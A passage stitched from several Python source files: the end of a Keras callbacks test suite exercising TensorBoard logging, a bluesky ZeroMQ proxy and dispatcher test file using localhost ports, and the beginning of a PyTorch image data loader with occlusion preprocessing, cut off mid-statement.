y_test[i * BATCH_SIZE:(i + 1) * BATCH_SIZE])
i += 1
i %= max_batch_index
# case: Sequential
with self.cached_session():
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
# non_trainable_weights: moving_variance, moving_mean
model.add(keras.layers.BatchNormalization())
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
tsb = keras.callbacks.TensorBoard(
log_dir=temp_dir, histogram_freq=1, write_images=True,
write_grads=True, batch_size=5)
cbks = [tsb]
# fit with validation data
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=3,
verbose=0)
# fit with validation data and accuracy
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
# fit generator with validation data
model.fit_generator(
data_generator(True),
len(x_train),
epochs=2,
validation_data=(x_test, y_test),
callbacks=cbks,
verbose=0)
# fit generator without validation data
# histogram_freq must be zero
tsb.histogram_freq = 0
model.fit_generator(
data_generator(True),
len(x_train),
epochs=2,
callbacks=cbks,
verbose=0)
# fit generator with validation data and accuracy
tsb.histogram_freq = 1
model.fit_generator(
data_generator(True),
len(x_train),
epochs=2,
validation_data=(x_test, y_test),
callbacks=cbks,
verbose=0)
# fit generator without validation data and accuracy
tsb.histogram_freq = 0
model.fit_generator(
data_generator(True), len(x_train), epochs=2, callbacks=cbks)
assert os.path.exists(temp_dir)
@test_util.run_deprecated_v1
def test_TensorBoard_multi_input_output(self):
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
filepath = os.path.join(tmpdir, 'logs')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(x_train) // BATCH_SIZE
else:
max_batch_index = len(x_test) // BATCH_SIZE
i = 0
while 1:
if train:
# simulate multi-input/output models
yield ([x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2,
[y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2)
else:
yield ([x_test[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2,
[y_test[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2)
i += 1
i %= max_batch_index
inp1 = keras.Input((INPUT_DIM,))
inp2 = keras.Input((INPUT_DIM,))
inp = keras.layers.add([inp1, inp2])
hidden = keras.layers.Dense(2, activation='relu')(inp)
hidden = keras.layers.Dropout(0.1)(hidden)
output1 = keras.layers.Dense(NUM_CLASSES, activation='softmax')(hidden)
output2 = keras.layers.Dense(NUM_CLASSES, activation='softmax')(hidden)
model = keras.models.Model([inp1, inp2], [output1, output2])
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# we must generate new callbacks for each test, as they aren't stateless
def callbacks_factory(histogram_freq):
return [keras.callbacks.TensorBoard(log_dir=filepath,
histogram_freq=histogram_freq,
write_images=True, write_grads=True,
batch_size=5)]
# fit without validation data
model.fit([x_train] * 2, [y_train] * 2, batch_size=BATCH_SIZE,
callbacks=callbacks_factory(histogram_freq=0), epochs=3)
# fit with validation data and accuracy
model.fit([x_train] * 2, [y_train] * 2, batch_size=BATCH_SIZE,
validation_data=([x_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1), epochs=2)
# fit generator without validation data
model.fit_generator(data_generator(True), len(x_train), epochs=2,
callbacks=callbacks_factory(histogram_freq=0))
# fit generator with validation data and accuracy
model.fit_generator(data_generator(True), len(x_train), epochs=2,
validation_data=([x_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1))
assert os.path.isdir(filepath)
@test_util.run_deprecated_v1
def test_Tensorboard_histogram_summaries_in_test_function(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
self.steps_seen = []
def add_summary(self, summary, global_step):
summary_obj = summary_pb2.Summary()
# ensure a valid Summary proto is being sent
if isinstance(summary, bytes):
summary_obj.ParseFromString(summary)
else:
assert isinstance(summary, summary_pb2.Summary)
summary_obj = summary
# keep track of steps seen for the merged_summary op,
# which contains the histogram summaries
if len(summary_obj.value) > 1:
self.steps_seen.append(global_step)
def flush(self):
pass
def close(self):
pass
def _init_writer(obj, _):
obj.writer = FileWriterStub(obj.log_dir)
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
with self.cached_session():
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
# non_trainable_weights: moving_variance, moving_mean
model.add(keras.layers.BatchNormalization())
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
keras.callbacks.TensorBoard._init_writer = _init_writer
tsb = keras.callbacks.TensorBoard(
log_dir=tmpdir,
histogram_freq=1,
write_images=True,
write_grads=True,
batch_size=5)
cbks = [tsb]
# fit with validation data
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=3,
verbose=0)
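      # histogram_freq=1 with batch_size=5 runs 2 merged-summary steps per
      # validation pass (10 test samples / 5), so 3 epochs log steps 0-5.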
self.assertAllEqual(tsb.writer.steps_seen, [0, 1, 2, 3, 4, 5])
@test_util.run_deprecated_v1
def test_Tensorboard_histogram_summaries_with_generator(self):
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
def generator():
x = np.random.randn(10, 100).astype(np.float32)
y = np.random.randn(10, 10).astype(np.float32)
while True:
yield x, y
with self.cached_session():
model = testing_utils.get_small_sequential_mlp(
num_hidden=10, num_classes=10, input_dim=100)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
tsb = keras.callbacks.TensorBoard(
log_dir=tmpdir,
histogram_freq=1,
write_images=True,
write_grads=True,
batch_size=5)
cbks = [tsb]
# fit with validation generator
model.fit_generator(
generator(),
steps_per_epoch=2,
epochs=2,
validation_data=generator(),
validation_steps=2,
callbacks=cbks,
verbose=0)
with self.assertRaises(ValueError):
# fit with validation generator but no
# validation_steps
model.fit_generator(
generator(),
steps_per_epoch=2,
epochs=2,
validation_data=generator(),
callbacks=cbks,
verbose=0)
self.assertTrue(os.path.exists(tmpdir))
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
      # Start an arbitrary thread that should run during model
# training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_TensorBoard_with_ReduceLROnPlateau(self):
with self.cached_session():
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='binary_crossentropy', optimizer='sgd', metrics=['accuracy'])
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', factor=0.5, patience=4, verbose=1),
keras.callbacks.TensorBoard(log_dir=temp_dir)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert os.path.exists(temp_dir)
@test_util.run_deprecated_v1
def test_Tensorboard_batch_logging(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
self.batches_logged = []
self.summary_values = []
self.summary_tags = []
def add_summary(self, summary, step):
self.summary_values.append(summary.value[0].simple_value)
self.summary_tags.append(summary.value[0].tag)
self.batches_logged.append(step)
def flush(self):
pass
def close(self):
pass
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='batch')
tb_cbk.writer = FileWriterStub(temp_dir)
for batch in range(5):
tb_cbk.on_batch_end(batch, {'acc': batch})
self.assertEqual(tb_cbk.writer.batches_logged, [0, 1, 2, 3, 4])
self.assertEqual(tb_cbk.writer.summary_values, [0., 1., 2., 3., 4.])
self.assertEqual(tb_cbk.writer.summary_tags, ['batch_acc'] * 5)
@test_util.run_deprecated_v1
def test_Tensorboard_epoch_and_batch_logging(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
def add_summary(self, summary, step):
if 'batch_' in summary.value[0].tag:
self.batch_summary = (step, summary)
elif 'epoch_' in summary.value[0].tag:
self.epoch_summary = (step, summary)
def flush(self):
pass
def close(self):
pass
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='batch')
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': 5.0})
batch_step, batch_summary = tb_cbk.writer.batch_summary
self.assertEqual(batch_step, 0)
self.assertEqual(batch_summary.value[0].simple_value, 5.0)
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='epoch')
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_epoch_end(0, {'acc': 10.0})
epoch_step, epoch_summary = tb_cbk.writer.epoch_summary
self.assertEqual(epoch_step, 0)
self.assertEqual(epoch_summary.value[0].simple_value, 10.0)
@test_util.run_in_graph_and_eager_modes
def test_Tensorboard_eager(self):
temp_dir = tempfile.mkdtemp(dir=self.get_temp_dir())
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='binary_crossentropy',
optimizer=adam.AdamOptimizer(0.01),
metrics=['accuracy'])
cbks = [keras.callbacks.TensorBoard(log_dir=temp_dir)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
self.assertTrue(os.path.exists(temp_dir))
@test_util.run_deprecated_v1
def test_TensorBoard_update_freq(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
self.batch_summaries = []
self.epoch_summaries = []
def add_summary(self, summary, step):
if 'batch_' in summary.value[0].tag:
self.batch_summaries.append((step, summary))
elif 'epoch_' in summary.value[0].tag:
self.epoch_summaries.append((step, summary))
def flush(self):
pass
def close(self):
pass
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
# Epoch mode
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='epoch')
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 1})
self.assertEqual(tb_cbk.writer.batch_summaries, [])
tb_cbk.on_epoch_end(0, {'acc': 10.0, 'size': 1})
self.assertEqual(len(tb_cbk.writer.epoch_summaries), 1)
# Batch mode
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='batch')
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 1})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 1)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 1})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 2)
self.assertFalse(tb_cbk.writer.epoch_summaries)
# Integer mode
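    # With update_freq=20 and 10 samples per batch, a summary is written once
    # every 20 samples seen, i.e. on every second batch.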
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq=20)
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
self.assertFalse(tb_cbk.writer.batch_summaries)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 1)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 1)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 2)
tb_cbk.on_batch_end(0, {'acc': 10.0, 'size': 10})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 2)
self.assertFalse(tb_cbk.writer.epoch_summaries)
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
if __name__ == '__main__':
test.main()
|
test_zmq.py
|
import multiprocessing
import os
import signal
from subprocess import run
import threading
import time
import numpy as np
import pytest
from bluesky import Msg
from bluesky.callbacks.zmq import Proxy, Publisher, RemoteDispatcher
from bluesky.plans import count
def test_proxy_script():
p = run(['bluesky-0MQ-proxy', '-h'])
assert p.returncode == 0
def test_zmq(RE, hw):
# COMPONENT 1
# Run a 0MQ proxy on a separate process.
def start_proxy():
Proxy(5567, 5568).start()
proxy_proc = multiprocessing.Process(target=start_proxy, daemon=True)
proxy_proc.start()
time.sleep(5) # Give this plenty of time to start up.
# COMPONENT 2
# Run a Publisher and a RunEngine in this main process.
p = Publisher('127.0.0.1:5567') # noqa
RE.subscribe(p)
# COMPONENT 3
# Run a RemoteDispatcher on another separate process. Pass the documents
# it receives over a Queue to this process, so we can count them for our
# test.
def make_and_start_dispatcher(queue):
def put_in_queue(name, doc):
print('putting ', name, 'in queue')
queue.put((name, doc))
d = RemoteDispatcher('127.0.0.1:5568')
d.subscribe(put_in_queue)
print("REMOTE IS READY TO START")
d.loop.call_later(9, d.stop)
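        # Stop the dispatcher's event loop after 9 seconds so this child
        # process can exit on its own.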
d.start()
queue = multiprocessing.Queue()
dispatcher_proc = multiprocessing.Process(target=make_and_start_dispatcher,
daemon=True, args=(queue,))
dispatcher_proc.start()
time.sleep(5) # As above, give this plenty of time to start.
    # Generate documents. The Publisher will send them to the proxy
# device over 5567, and the proxy will send them to the
# RemoteDispatcher over 5568. The RemoteDispatcher will push them into
# the queue, where we can verify that they round-tripped.
local_accumulator = []
def local_cb(name, doc):
local_accumulator.append((name, doc))
# Check that numpy stuff is sanitized by putting some in the start doc.
md = {'stuff': {'nested': np.array([1, 2, 3])},
'scalar_stuff': np.float64(3),
'array_stuff': np.ones((3, 3))}
# RE([Msg('open_run', **md), Msg('close_run')], local_cb)
RE(count([hw.det]), local_cb)
time.sleep(1)
    # Get the documents from the queue (or timeout --- test will fail)
remote_accumulator = []
for i in range(len(local_accumulator)):
remote_accumulator.append(queue.get(timeout=2))
p.close()
proxy_proc.terminate()
dispatcher_proc.terminate()
proxy_proc.join()
dispatcher_proc.join()
assert remote_accumulator == local_accumulator
def test_zmq_components():
# The test `test_zmq` runs Proxy and RemoteDispatcher in a separate
# process, which coverage misses.
pid = os.getpid()
def delayed_sigint(delay):
time.sleep(delay)
os.kill(os.getpid(), signal.SIGINT)
proxy = Proxy(5567, 5568)
assert not proxy.closed
threading.Thread(target=delayed_sigint, args=(5,)).start()
try:
proxy.start()
# delayed_sigint stops the proxy
except KeyboardInterrupt:
...
assert proxy.closed
with pytest.raises(RuntimeError):
proxy.start()
proxy = Proxy() # random port
threading.Thread(target=delayed_sigint, args=(5,)).start()
try:
proxy.start()
# delayed_sigint stops the proxy
except KeyboardInterrupt:
...
repr(proxy)
# test that two ways of specifying address are equivalent
d = RemoteDispatcher('localhost:5555')
assert d.address == ('localhost', 5555)
d = RemoteDispatcher(('localhost', 5555))
assert d.address == ('localhost', 5555)
repr(d)
def test_zmq_no_RE(RE):
# COMPONENT 1
# Run a 0MQ proxy on a separate process.
def start_proxy():
Proxy(5567, 5568).start()
proxy_proc = multiprocessing.Process(target=start_proxy, daemon=True)
proxy_proc.start()
time.sleep(5) # Give this plenty of time to start up.
# COMPONENT 2
# Run a Publisher and a RunEngine in this main process.
p = Publisher('127.0.0.1:5567') # noqa
# COMPONENT 3
# Run a RemoteDispatcher on another separate process. Pass the documents
# it receives over a Queue to this process, so we can count them for our
# test.
def make_and_start_dispatcher(queue):
def put_in_queue(name, doc):
print('putting ', name, 'in queue')
queue.put((name, doc))
d = RemoteDispatcher('127.0.0.1:5568')
d.subscribe(put_in_queue)
print("REMOTE IS READY TO START")
d.loop.call_later(9, d.stop)
d.start()
queue = multiprocessing.Queue()
dispatcher_proc = multiprocessing.Process(target=make_and_start_dispatcher,
daemon=True, args=(queue,))
dispatcher_proc.start()
time.sleep(5) # As above, give this plenty of time to start.
# Generate two documents. The Publisher will send them to the proxy
# device over 5567, and the proxy will send them to the
# RemoteDispatcher over 5568. The RemoteDispatcher will push them into
# the queue, where we can verify that they round-tripped.
local_accumulator = []
def local_cb(name, doc):
local_accumulator.append((name, doc))
RE([Msg('open_run'), Msg('close_run')], local_cb)
# This time the Publisher isn't attached to an RE. Send the documents
# manually. (The idea is, these might have come from a Broker instead...)
for name, doc in local_accumulator:
p(name, doc)
time.sleep(1)
# Get the two documents from the queue (or timeout --- test will fail)
remote_accumulator = []
for i in range(2):
remote_accumulator.append(queue.get(timeout=2))
p.close()
proxy_proc.terminate()
dispatcher_proc.terminate()
proxy_proc.join()
dispatcher_proc.join()
assert remote_accumulator == local_accumulator
def test_zmq_no_RE_newserializer(RE):
cloudpickle = pytest.importorskip('cloudpickle')
# COMPONENT 1
# Run a 0MQ proxy on a separate process.
def start_proxy():
Proxy(5567, 5568).start()
proxy_proc = multiprocessing.Process(target=start_proxy, daemon=True)
proxy_proc.start()
time.sleep(5) # Give this plenty of time to start up.
# COMPONENT 2
# Run a Publisher and a RunEngine in this main process.
p = Publisher('127.0.0.1:5567', serializer=cloudpickle.dumps) # noqa
# COMPONENT 3
# Run a RemoteDispatcher on another separate process. Pass the documents
# it receives over a Queue to this process, so we can count them for our
# test.
def make_and_start_dispatcher(queue):
def put_in_queue(name, doc):
print('putting ', name, 'in queue')
queue.put((name, doc))
d = RemoteDispatcher('127.0.0.1:5568', deserializer=cloudpickle.loads)
d.subscribe(put_in_queue)
print("REMOTE IS READY TO START")
d.loop.call_later(9, d.stop)
d.start()
queue = multiprocessing.Queue()
dispatcher_proc = multiprocessing.Process(target=make_and_start_dispatcher,
daemon=True, args=(queue,))
dispatcher_proc.start()
time.sleep(5) # As above, give this plenty of time to start.
# Generate two documents. The Publisher will send them to the proxy
# device over 5567, and the proxy will send them to the
# RemoteDispatcher over 5568. The RemoteDispatcher will push them into
# the queue, where we can verify that they round-tripped.
local_accumulator = []
def local_cb(name, doc):
local_accumulator.append((name, doc))
RE([Msg('open_run'), Msg('close_run')], local_cb)
# This time the Publisher isn't attached to an RE. Send the documents
# manually. (The idea is, these might have come from a Broker instead...)
for name, doc in local_accumulator:
p(name, doc)
time.sleep(1)
# Get the two documents from the queue (or timeout --- test will fail)
remote_accumulator = []
for i in range(2):
remote_accumulator.append(queue.get(timeout=2))
p.close()
proxy_proc.terminate()
dispatcher_proc.terminate()
proxy_proc.join()
dispatcher_proc.join()
assert remote_accumulator == local_accumulator
def test_zmq_prefix(RE, hw):
# COMPONENT 1
# Run a 0MQ proxy on a separate process.
def start_proxy():
Proxy(5567, 5568).start()
proxy_proc = multiprocessing.Process(target=start_proxy, daemon=True)
proxy_proc.start()
time.sleep(5) # Give this plenty of time to start up.
# COMPONENT 2
# Run a Publisher and a RunEngine in this main process.
p = Publisher('127.0.0.1:5567', prefix=b'sb') # noqa
p2 = Publisher('127.0.0.1:5567', prefix=b'not_sb') # noqa
RE.subscribe(p)
RE.subscribe(p2)
# COMPONENT 3
# Run a RemoteDispatcher on another separate process. Pass the documents
# it receives over a Queue to this process, so we can count them for our
# test.
def make_and_start_dispatcher(queue):
def put_in_queue(name, doc):
print('putting ', name, 'in queue')
queue.put((name, doc))
d = RemoteDispatcher('127.0.0.1:5568', prefix=b'sb')
d.subscribe(put_in_queue)
print("REMOTE IS READY TO START")
d.loop.call_later(9, d.stop)
d.start()
queue = multiprocessing.Queue()
dispatcher_proc = multiprocessing.Process(target=make_and_start_dispatcher,
daemon=True, args=(queue,))
dispatcher_proc.start()
time.sleep(5) # As above, give this plenty of time to start.
# Generate two documents. The Publisher will send them to the proxy
# device over 5567, and the proxy will send them to the
# RemoteDispatcher over 5568. The RemoteDispatcher will push them into
# the queue, where we can verify that they round-tripped.
local_accumulator = []
def local_cb(name, doc):
local_accumulator.append((name, doc))
# Check that numpy stuff is sanitized by putting some in the start doc.
md = {'stuff': {'nested': np.array([1, 2, 3])},
'scalar_stuff': np.float64(3),
'array_stuff': np.ones((3, 3))}
# RE([Msg('open_run', **md), Msg('close_run')], local_cb)
RE(count([hw.det]), local_cb)
time.sleep(1)
# Get the two documents from the queue (or timeout --- test will fail)
remote_accumulator = []
for i in range(len(local_accumulator)):
remote_accumulator.append(queue.get(timeout=2))
p.close()
proxy_proc.terminate()
dispatcher_proc.terminate()
proxy_proc.join()
dispatcher_proc.join()
assert remote_accumulator == local_accumulator
|
data_loader.py
|
from __future__ import print_function, division, absolute_import
import glob
import random
import time
# Python 2/3 support
try:
import queue
except ImportError:
import Queue as queue
import cv2
import numpy as np
import torch as th
from joblib import Parallel, delayed
from torch.multiprocessing import Queue, Process
from .preprocess import IMAGE_WIDTH, IMAGE_HEIGHT
from .utils import preprocessInput
def sample_coordinates(coord_1, max_distance, percentage):
"""
    Given a first coordinate, sample a second one within a maximum distance of [max_distance * percentage]
    :param coord_1: (int) first coordinate
:param max_distance: (int) max value of coordinate in the axis
:param percentage: (float) maximum occlusion as a percentage
:return: (tuple of int)
"""
min_coord_2 = max(0, coord_1 - max_distance * percentage)
max_coord_2 = min(coord_1 + max_distance * percentage, max_distance)
coord_2 = np.random.randint(low=min_coord_2, high=max_coord_2)
return min(coord_1, coord_2), max(coord_1, coord_2)
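# Illustrative sketch (not part of the original module): with coord_1=50,
# max_distance=100 and percentage=0.5, the second coordinate is drawn from
# [0, 100), at most 50 away from coord_1, and the pair is returned in
# ascending order.
def _demo_sample_coordinates():
    low, high = sample_coordinates(coord_1=50, max_distance=100, percentage=0.5)
    assert 0 <= low <= high <= 100
    assert high - low <= 50
    return low, high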
def preprocessImage(image, convert_to_rgb=True, apply_occlusion=False, occlusion_percentage=0.5):
"""
:param image: (np.ndarray) image (BGR or RGB)
:param convert_to_rgb: (bool) whether the conversion to rgb is needed or not
    :param apply_occlusion: (bool) whether to occlude part of the image or not
(used for training denoising autoencoder)
:param occlusion_percentage: (float) max percentage of occlusion (in width and height)
:return: (np.ndarray)
"""
# Resize
im = cv2.resize(image, (IMAGE_WIDTH, IMAGE_HEIGHT), interpolation=cv2.INTER_AREA)
# Convert BGR to RGB
if convert_to_rgb:
im = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)
# Normalize
im = preprocessInput(im.astype(np.float32), mode="image_net")
if apply_occlusion:
h_1 = np.random.randint(IMAGE_HEIGHT)
h_1, h_2 = sample_coordinates(h_1, IMAGE_HEIGHT, percentage=occlusion_percentage)
w_1 = np.random.randint(IMAGE_WIDTH)
w_1, w_2 = sample_coordinates(w_1, IMAGE_WIDTH, percentage=occlusion_percentage)
noisy_img = im
        # Occlude the sampled rectangle by setting its pixels to zero.
noisy_img[h_1:h_2, w_1:w_2, :] = 0.
im = noisy_img
return im
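# Illustrative sketch (not part of the original module): preprocess a dummy BGR
# frame with occlusion enabled, as the denoising-autoencoder training path does.
# Assuming preprocessInput preserves the array shape, the output has shape
# (IMAGE_HEIGHT, IMAGE_WIDTH, 3) with a zeroed rectangle covering at most
# ~occlusion_percentage of each axis.
def _demo_preprocess_image():
    dummy_bgr = np.random.randint(0, 256, (480, 640, 3), dtype=np.uint8)
    out = preprocessImage(dummy_bgr, apply_occlusion=True, occlusion_percentage=0.3)
    assert out.shape == (IMAGE_HEIGHT, IMAGE_WIDTH, 3)
    return out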
class DataLoader(object):
def __init__(self, minibatchlist, images_path, n_workers=1, multi_view=False, use_triplets=False,
infinite_loop=True, max_queue_len=4, is_training=False, apply_occlusion=False,
occlusion_percentage=0.5, absolute_path=False):
"""
A Custom dataloader to work with our datasets, and to prepare data for the different models
(inverse, priors, autoencoder, ...)
:param minibatchlist: ([np.array]) list of observations indices (grouped per minibatch)
:param images_path: (np.array) Array of path to images
        :param n_workers: (int) number of preprocessing workers (each loads and preprocesses an image)
:param multi_view: (bool)
:param use_triplets: (bool)
        :param infinite_loop: (bool) whether to have an iterator that can be reset; set to False, the iterator stops after a single pass over the data
:param max_queue_len: (int) Max number of minibatches that can be preprocessed at the same time
:param apply_occlusion: is the use of occlusion enabled - when using DAE (bool)
:param occlusion_percentage: max percentage of occlusion when using DAE (float)
:param is_training: (bool)
Set to True, the dataloader will output both `obs` and `next_obs` (a tuple of th.Tensor)
            Set to False, it will only output one th.Tensor.
"""
super(DataLoader, self).__init__()
self.n_workers = n_workers
self.infinite_loop = infinite_loop
self.n_minibatches = len(minibatchlist)
self.minibatchlist = minibatchlist
self.images_path = images_path
self.shuffle = is_training
self.queue = Queue(max_queue_len)
self.process = None
self.use_triplets = use_triplets
self.multi_view = multi_view
# apply occlusion for training a DAE
self.apply_occlusion = apply_occlusion
self.occlusion_percentage = occlusion_percentage
self.absolute_path = absolute_path
self.startProcess()
@staticmethod
def createTestMinibatchList(n_samples, batch_size):
"""
        Create a list of minibatches for plotting
:param n_samples: (int)
:param batch_size: (int)
:return: ([np.array])
"""
minibatchlist = []
for i in range(n_samples // batch_size + 1):
start_idx = i * batch_size
end_idx = min(n_samples, (i + 1) * batch_size)
minibatchlist.append(np.arange(start_idx, end_idx))
return minibatchlist
def startProcess(self):
"""Start preprocessing process"""
self.process = Process(target=self._run)
        # Make it a daemon, so it will be terminated at the same time
        # as the main process
self.process.daemon = True
self.process.start()
def _run(self):
start = True
with Parallel(n_jobs=self.n_workers, batch_size="auto", backend="threading") as parallel:
while start or self.infinite_loop:
start = False
if self.shuffle:
indices = np.random.permutation(self.n_minibatches).astype(np.int64)
else:
indices = np.arange(len(self.minibatchlist), dtype=np.int64)
for minibatch_idx in indices:
batch_noisy, batch_obs_noisy, batch_next_obs_noisy = None, None, None
if self.shuffle:
images = np.stack((self.images_path[self.minibatchlist[minibatch_idx]],
self.images_path[self.minibatchlist[minibatch_idx] + 1]))
images = images.flatten()
else:
images = self.images_path[self.minibatchlist[minibatch_idx]]
if self.n_workers <= 1:
batch = [self._makeBatchElement(image_path, self.multi_view, self.use_triplets,
absolute_path=self.absolute_path)
for image_path in images]
if self.apply_occlusion:
batch_noisy = [self._makeBatchElement(image_path, self.multi_view, self.use_triplets,
apply_occlusion=self.apply_occlusion,
occlusion_percentage=self.occlusion_percentage,
absolute_path=self.absolute_path)
for image_path in images]
else:
batch = parallel(
delayed(self._makeBatchElement)(image_path, self.multi_view, self.use_triplets,
